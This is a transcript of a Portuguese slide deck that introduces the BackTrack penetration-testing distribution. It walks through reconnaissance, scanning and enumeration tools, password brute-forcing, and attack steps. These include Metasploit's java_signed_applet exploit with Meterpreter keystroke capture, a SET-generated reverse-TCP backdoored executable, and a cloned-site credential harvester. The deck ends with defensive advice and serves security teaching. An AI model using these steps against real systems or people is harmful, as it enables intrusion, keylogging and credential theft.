back track apresentação
Post on 09-Jun-2015
667 Views
Preview:
DESCRIPTION
TRANSCRIPT
Kleber Santos
Introdução
IntroduçãoO que é?
• Ferramenta voltada para testes de penetração;
• Primeira versão lançada em 2006;• Possui mais de 300 ferramentas para
tais testes;
Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link:
http://www.backtrack-linux.org/
IntroduçãoUso em Certificações
• Todas oferecidas pela Offensive Security que mantém o BackTrack.
Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link:
http://www.backtrackbrasil.com.br/site/vd/
Pentest
• Metodologia para testes de penetração;• Simula ataques;• Verifica a segurança de um sistema;• Possibilita criação de mecanismos de
defesa;
Pentest
• Procedimentos divididos em cinco etapas:
1. Obtenção de informações do alvo;
2. Varreduras de sistema;
3. Ganho de acesso ao sistema;
4. Mantendo o acesso ao sistema;
5. Retirada de evidencias;
• Abordaremos as três primeiras etapas divididas em quatro partes;
Pentest
• Procedimentos divididos em cinco etapas:
1. Obtenção de informações do alvo;
2. Varreduras de sistema;
3. Ganho de acesso ao sistema;
4. Mantendo o acesso ao sistema;
5. Retirada de evidencias;
• Abordaremos as três primeiras etapas divididas em quatro partes;
Primeira Parte
• Obtenção de Informação;• Detecção de Sistemas Ativos;• Técnica Para Obter Informações DNS;• FINGERPRINT;
Obtenção de Informação
• Metodologia usada para "reconhecimento do terreno";
• Pode ser de forma: passiva (recursos na internet); ativa (engenharia social);
• Princípios básicos na obtenção de informações;
• PING detecta hosts ativos;
Detecção de Sistemas Ativos
FPING: Executa ping para diferentes hosts ao mesmo
tempo através de um *.txt;
HPING3: Detecta hosts, regras de firewall e realiza
varreduras de portas;
Genlist: Verifica uma lista de hosts ativos;
Detecção de Sistemas Ativos
• DNS traduz endereços de IP em nomes de domínio;
• A ferramenta nslookup permite obter informações sobre DNS;
Informações DNS
DNSENUM: Pesquisa de hosts, nomes de servidores, registros MX, IPs, etc.
DNSMAP: Descobre subdomínios relacionados ao domínio-alvo. Acompanha
wordlist;
DNSRECON: Permite consultas reversas por faixas de IP, NS, SOA, registros MX,
transferências de zonas e enumeração de serviços;
FIERCE: Retorna informações adicionais como HINFO, especificando o
processador da máquina e o servidor;
Informações DNS
• Técnica na qual se obtém informações sobre sistema operacional;
• O NMAP é utilizado para tal checagem de versões;
root@bt~# nmap –O <ip_do_alvo>
FINGERPRINT
TCP SYN (-sS) examina portas de maneira rápida e difícil
de ser detectado por firewalls ou IDS;
TCP Connect (-sT) executa varredura utilizando o Three-Way
Handshake;
UDP (-sU) possibilita varredura do protocolo UDP;
FINGERPRINT
TCP FIN (-sF, -sX, -sN) utilizados na tentativa de travessia de
firewalls;
TCP ACK (-sA) tática utilizada para detecção de regras de
firewall;
TCP Windows (-sW) varreduras por janelas, parecido com o método
ACK, porém consegue detectar portas abertas versus filtradas e não filtradas;
FINGERPRINT
Segunda Parte
• SCANNING de portas• Detecção de Sistemas Ativos;• NETCAT – Canivete Suíço;
SCANNING de portas
• Port Scan é a técnica usada para descobrir serviços vulneráveis em um sistema;
Scanning de portas: identifica portas ativas;
De vulnerabilidades: identifica fraquezas no sistema;
De redes: identifica os hosts ativos;
Detecção de Sistemas Ativos
NETCAT – Canivete Suíço
• Outra ferramenta possível para varreduras num host;
root@root:~# nc -v -z 192.168.32.128 1-4000
• Fase de Enumeração;• HTTPRINT;• AMAP, SMTP e SMTPSCAN;
Terceira Parte
Fase de Enumeração
• Nesta fase o invasor tenta obter: nomes de máquinas; usuários; serviços e versões; compartilhamentos, etc;
• A ferramenta Nbtscan nos permite obter nome e endereço MAC de um alvo;
Fase de Enumeração
• Através do nmap podemos executar varredura procurando por serviços que utilizem o protocolo UDP:
root@root~# nmap –T4 –sU –sV <ip_host_alvo>
Fase de Enumeração
• Obtendo retorno de serviços snmp podemos obter informações SNMP com o Snmpcheck:
root@root:/pentest/enumeration/snmp/snmpcheck# ./snmpcheck-1.8.pl –t <ip_host_alvo>
HTTPRINT
• Possibilita detectar versões de servidores;
• Fornece opção de exporta-las para arquivos *.html, *.csv ou *.xml
AMAP, SMTP e SMTPSCAN
AMAP tenta identificar aplicações rodando em
portas diferentes da usual.
SMTP e SMTPScan busca usuários válidos do nosso host,
destinando um IP alvo;
• Ganho de Acesso;• Abordagem à Força Bruta;• SET e Metasploit;
Quarta Parte
Ganho de Acesso
• Utiliza de ferramentas que explorem serviços como FTP e SSH;
• Explora vulnerabilidades e senhas;• A técnica de engenharia social é
extremamente importante em tal etapa;
Força Bruta
xHydra ou Hidra-GTK
Ferramenta utilizada para quebra de senhas ONLINE;
Suporta diversos protocolos; Permite utilização de arquivos auxiliares
para listas de usuários e senhas (wordlists);
Força Bruta
• Dicionários e força bruta são técnicas utilizadas para o password cracking;
• Outras ferramentas para o mesmo intuito são:
Medusa; John The Ripper;
Todas elas inclusas no BackTrack 5 R3;
Invadindo Sistemas com SET e Metasploit
Metasploit Conta com uma interface gráfica
ARMITAGE e também a linha de comando, MSFCONSOLE;
SET Tem como alvo fraquezas e estupidez
humanas;
Invadindo Sistemas com SET e Metasploit
• Através do comando msfconsole acessamos o Metasploit via linha de comando;
• Configuraremos nossa máquina BackTrack para receber informações do alvo através de uma vulnerabilidade do Java;
Invadindo Sistemas com SET e Metasploit
Invadindo Sistemas com SET e Metasploit
• root@bt:~# msfconsole
• root@bt:~# search java
• root@bt:~# use exploit/multi/browser/java_signed_applet
• root@bt:~# show options
Invadindo Sistemas com SET e Metasploit
set srvhost <ip_local_host_backTrack>
set srvport 80 #seta a porta 80 como acesso
set uripath <caminho_para_link_url>
set appletname <nome_para_o_arquivo_jar>
exploit
Invadindo Sistemas com SET e Metasploit
• Após acessar a URL gerada o alvo permitirá acesso ao invasor;
sessions –i 1 # dá acesso à máquina alvo
sysinfo# obtém informações da máquina alvo
Invadindo Sistemas com SET e Metasploit
help# lista comandos do METERPRETER
screenshot# obtém um print da tela da máquina invadida
Invadindo Sistemas com SET e Metasploit
keyscan_start# starta um sniffer para captura de navegação
keyscan_dump# exibe informações capturadas
Invadindo Sistemas com SET e Metasploit
• Técnica semelhante pode ser explorada através da ferramenta SET gerando-se um payload;
• Ao acessar a ferramenta, navega-se em:
1 – Social Engineering Attacks;4 – Create a Payload na Listener;
Invadindo Sistemas com SET e Metasploit
• Deve-se informar o IP da máquina que receberá as informações obtidas através do payload (IP da máquina BackTrack);
• Feito isso, navega-se em:
2 – Windows Reverse TCP Meterpreter;16 – Backdoored Executable (BEST);
Invadindo Sistemas com SET e Metasploit
• Após informar a porta solicitada, ele gerará o arquivo executável:
/pentest/exploits/set msf.exe
• Confirma-se com yes o start do listener;• O acesso à máquina alvo se dará após a
execução do arquivo pela mesma e executando:
sessions –i 1.
Invadindo Sistemas com SET e Metasploit
• Com a mesma ferramenta SET, podemos clonar páginas web para obter informações de uma vítima através das opções:
1 – Social Engineering Attacks;2 – Website Attack Vectors;3 – Credential Harvester Attack Vectors;2 – Site Cloner;
Invadindo Sistemas com SET e Metasploit
• Informa-se a URL do site a ser clonado;
• Acessa-se através do IP da máquina do atacante;
Obs.: Podemos atribuir um domínio ao IP para facilitar o acesso pela vítima;
Conclusão
• Técnicas de invasão estão
diretamente atreladas às
vulnerabilidades dos sistemas e das pessoas
Conclusão
• Configurar devidamente servidores;• Atualizar devidamente SOs e SWs;• Utilização de senhas fortes;• Desconfiar de coisas óbvias;• Usufruir de uma política de segurança;
Conclusão
• Atentar à boas práticas voltadas
à segurança nos dá uma garantia quanto
ao CID;
klebernox.wordpress.com/backtrack-abordagem-a-seguranca-em-redes/
Obrigado !
top related